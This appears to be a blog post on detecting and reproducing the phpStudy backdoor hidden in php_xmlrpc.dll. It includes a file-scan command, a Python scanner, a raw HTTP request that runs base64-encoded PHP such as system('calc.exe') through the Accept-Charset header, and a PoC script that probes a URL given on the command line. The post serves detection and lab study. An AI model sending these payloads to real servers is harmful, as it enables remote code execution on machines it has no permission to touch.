phpStudy backdoor check + reproduction

Recently it came out that phpStudy ships with a backdoor. At the time I paid no attention, sure it couldn't happen to me... and then reality hit.
Looking at my own phpStudy 2018, the database suddenly broke, and only then did I realise I had been someone else's zombie machine for years...
Come check whether your phpStudy has this backdoor.

If you don't want to reproduce it and only want to check, open cmd and run:

cd phpstudy
findstr /m /s /c:"@eval" *.*

[Screenshot 1: findstr output]
If it finds a match, you most likely have the backdoor; consider uninstalling and reinstalling PHP from the official site, or running 360's trojan scan.
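The same check as the findstr command, as an added example that is not part of the original post: a Python scanner that walks a directory tree and reports which files contain the "@eval" marker, reading files as bytes because the tainted php_xmlrpc.dll is a PE file. The sample tree it builds is constructed here, not a real phpStudy install.

```python
import os
import tempfile

# The string the post searches for with: findstr /m /s /c:"@eval" *.*
EVAL_MARKER = b"@eval"


def scan_for_eval_marker(root, marker=EVAL_MARKER):
    """Walk `root` and return relative paths of files that contain `marker`.

    Like `findstr /m /s`, only file names are reported. Files are read in
    binary so a DLL with the marker embedded in its data is still matched.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it, don't abort the scan
            if marker in data:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_sample_tree():
    """Constructed sample: a fake phpStudy tree with one tainted and one clean DLL."""
    root = tempfile.mkdtemp(prefix="phpstudy_sample_")
    ext_dir = os.path.join(root, "PHPTutorial", "php", "php-5.2.17", "ext")
    os.makedirs(ext_dir)
    # Fake PE-like blob carrying the marker the backdoored DLL contains.
    with open(os.path.join(ext_dir, "php_xmlrpc.dll"), "wb") as fh:
        fh.write(b"MZ" + b"\x00" * 64 + b"@eval(%s('%s'))" + b"\x00" * 16)
    # Clean DLL without the marker.
    with open(os.path.join(ext_dir, "php_curl.dll"), "wb") as fh:
        fh.write(b"MZ" + b"\x00" * 80)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit in scan_for_eval_marker(sample_root):
        print("suspicious:", hit)
```

Point `scan_for_eval_marker` at the real phpStudy directory to get the same result as the findstr command.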

Reproduction:

Setup: a Windows 10 VM, phpstudy20181102, and Burp Suite (bp) for capturing requests

Locate PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
Open it in Notepad
Search for eval and you get @eval(%s('%s')); if this string is present, it is most likely the backdoor
[Screenshot 2: the @eval string inside php_xmlrpc.dll]
Start phpStudy; my version is php-5.4.45 + Apache
exp:
Accept-Charset is where the command is executed: its value is the base64-encoded system('calc.exe');

GET / HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdjYWxjLmV4ZScpOw==
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close


Run phpinfo();
base64 encoded ----> cGhwaW5mbyUyOCUyOSUzQg==
[Screenshot 3: phpinfo output]

Besides phpStudy 2018, phpStudy 2016 is affected as well:
phpStudy 2016, php-5.4
phpStudy 2018, php-5.2.17
phpStudy 2018, php-5.4.45
Backdoor path: \php\php-5.2.17\ext\php_xmlrpc.dll

Script check:

# -*- coding: utf-8 -*-

import base64
import sys

import requests


def poc(url):
    # Benign probe: the backdoor runs the base64-decoded Accept-Charset value as PHP,
    # so a backdoored host echoes the marker back in the response body.
    payload = 'echo "hello phpstudy";'
    probe = base64.b64encode(payload.encode('utf-8')).decode('ascii')
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Connection": "close",
        "Accept-Encoding": "gzip,deflate",
        "Accept-Charset": probe,
        "Upgrade-Insecure-Requests": "1",
    }
    r = requests.get(url, headers=headers, timeout=10)
    # The original condition ("A" or "B" ... in r.text) was always true because of
    # operator precedence; test for the echoed marker explicitly.
    if "hello phpstudy" in r.text:
        print("phpStudy backdoor present")
    else:
        print("no phpStudy backdoor")


if len(sys.argv) < 2:
    print("usage: python phpstudy.py http://127.0.0.1")
else:
    poc(sys.argv[1])


Fix: 360 (an honest vendor)
